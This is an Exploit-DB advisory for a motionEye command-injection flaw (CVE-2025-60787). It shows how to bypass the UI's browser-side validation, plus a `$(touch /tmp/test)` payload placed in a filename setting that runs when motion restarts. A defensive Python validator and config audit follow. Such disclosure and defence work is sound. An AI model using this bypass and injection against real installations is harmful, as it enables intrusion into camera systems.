[webapps] motionEye 0.43.1b4 - RCE
Summary: motionEye <= 0.43.1b4 has a remote code execution (RCE) vulnerability. By bypassing the web UI's client-side JavaScript validation, an attacker can inject shell command-substitution syntax into the motion configuration; when motion is restarted it parses that configuration and executes the embedded command. The issue is recorded as CVE-2025-60787. The recommended fix is to filter the input characters or enforce a whitelist for filename values.

Published: 2026-02-11 Author: www.exploit-db.com

# Exploit Title: motionEye 0.43.1b4 - RCE 
# Exploit PoC: motionEye RCE via client-side validation bypass (safe PoC)
# Filename: motioneye_rce_poc_edb.txt
# Author: prabhatverma47
# Date tested: 2025-05-14 (original test); prepared for submission: 2025-10-11
# Affected Versions: motionEye <= 0.43.1b4
# Tested on: Debian host running Docker; motionEye image ghcr.io/motioneye-project/motioneye:edge
# CVE(s) / References: MITRE/OSV advisories referenced: CVE-2025-60787 
#
# Short description:
# Client-side validation in motionEye's web UI can be bypassed by overriding the JS validation
# function in the browser console. Arbitrary values (including shell command-substitution
# syntax such as $(...)) are then saved verbatim into the motion config. When motion is
# restarted it parses that config, and shell syntax embedded in filename-pattern values such
# as picture_filename (the "Image File Name" field in the UI) is executed.
#
# Safe PoC: creates a harmless file /tmp/test inside container (non-destructive).
#
# Environment setup:
# 1) Start the motionEye docker image:
#    docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
#
# 2) Verify version in logs:
#    docker logs motioneye | grep "motionEye server"
#    Expect: 0.43.1b4 (any version <= 0.43.1b4 is affected)
#
# 3) Access web UI:
#    Open http://127.0.0.1:9999
#    Login: admin (blank password in default/edge image)
#
# Reproduction (manual + safe PoC):
# A) Bypass client-side validation in browser console:
#    1) Open browser devtools on the dashboard (F12 / Ctrl+Shift+I).
#    2) In the Console tab paste and run:
#
#       configUiValid = function() { return true; };
#
#    This forces the UI validation function to always return true and allows any value
#    to be accepted by the UI forms.
#
# B) Safe payload (paste this into Settings → Still Images → Image File Name and Apply):
#    $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
#
#    After applying, motionEye restarts motion (motionctl) so that it re-reads the config; when
#    motion processes the filename pattern, the embedded "touch" runs and /tmp/test is created
#    inside the motionEye container.
#
# C) Verify from host:
#    docker exec -it motioneye ls -la /tmp | grep test
#
# Expected result:
#    /tmp/test exists (created with the permissions of the motion process).
#
# Notes / root cause:
# - The UI writes the unsanitized value into camera-*.conf (e.g., picture_filename). motion
#   later parses that file and, when it uses the value as a filename pattern, the embedded
#   shell metacharacters ($(...) in this PoC) are executed.
# - Fix: sanitize/whitelist the characters allowed in filename values server-side (the PoC
#   repository's README contains an example sanitizer).
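# The configUiValid() bypass in section A and the root cause above come down to one point: the
# only validation lives in the browser, so it has to be repeated on the server before a value
# reaches camera-*.conf. The following is an added example, not motionEye's code and not the
# author's PoC: a whitelist validator for motion filename patterns (path characters plus
# %-specifiers only, no ".." segment) and an audit that scans a camera-*.conf for values that
# fail it. The sample config text is constructed; the /etc/motioneye/camera-1.conf path and
# the filename keys other than picture_filename are assumptions.

```python
import re
import sys

# motion option names whose values are expanded into file names at runtime. Only
# picture_filename is named in the advisory; the other three are motion options
# assumed (not verified here) to be expanded the same way.
FILENAME_KEYS = frozenset(
    {"picture_filename", "movie_filename", "snapshot_filename", "timelapse_filename"}
)

# Whitelist grammar: a value is a sequence of tokens, each either a conversion
# specifier (%% or % followed by one ASCII letter, covering strftime-style
# %Y-%m-%d as well as motion's own single-letter specifiers) or one plain path
# character. Anything else ($, (, ), `, ;, |, &, <, >, quotes, spaces, newlines)
# is rejected outright rather than "cleaned", so no caller is surprised by a
# silently rewritten value.
_PATTERN = re.compile(r"^(?:%[A-Za-z%]|[A-Za-z0-9_./-])+$")


def validate_filename_pattern(value: str) -> bool:
    """Server-side replacement for the bypassable browser-side check.

    Returns True only if `value` consists of whitelisted tokens and contains no
    '..' path segment (so a pattern cannot climb out of motion's target_dir).
    """
    if not _PATTERN.fullmatch(value):
        return False
    return ".." not in value.split("/")


def audit_motion_config(conf_text: str) -> list[tuple[str, str]]:
    """Scan a motion camera-*.conf and return (key, value) pairs that fail the whitelist.

    motion's config format is one `option value` pair per line; lines starting
    with '#' or ';' are comments. The value is everything after the first
    whitespace run, so a payload containing spaces is kept intact.
    """
    findings = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts
        if key in FILENAME_KEYS and not validate_filename_pattern(value):
            findings.append((key, value))
    return findings


# Constructed sample of what camera-1.conf could look like after the advisory's
# payload has been saved through the UI. This is not real motionEye output.
SAMPLE_CONF = """\
# camera-1.conf (constructed sample)
camera_name Camera1
target_dir /var/lib/motioneye/Camera1
picture_filename $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
movie_filename %Y-%m-%d/%H-%M-%S
snapshot_filename %Y-%m-%d/%H-%M-%S-snapshot
"""


if __name__ == "__main__":
    # Usage: docker exec motioneye cat /etc/motioneye/camera-1.conf > camera-1.conf
    #        python3 audit.py camera-1.conf
    # (the /etc/motioneye path is an assumption about the docker image's layout;
    # with no argument the constructed sample is audited instead)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_CONF
    for key, value in audit_motion_config(text):
        print(f"UNSAFE {key} = {value!r}")
```

# A non-empty audit result is the same condition that section C later confirms through the
# presence of /tmp/test, but caught before motion is restarted; applying the validator at
# config-save time is the whitelist fix the root-cause note calls for.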
#
# References:
# - Original PoC & writeup: https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
# - motionEye upstream: https://github.com/motioneye-project/motioneye
# - OSV/GHSA advisories referencing this issue (published May–Oct 2025)
# - NVD entries: CVE-2025-60787

Source: https://www.exploit-db.com/exploits/52481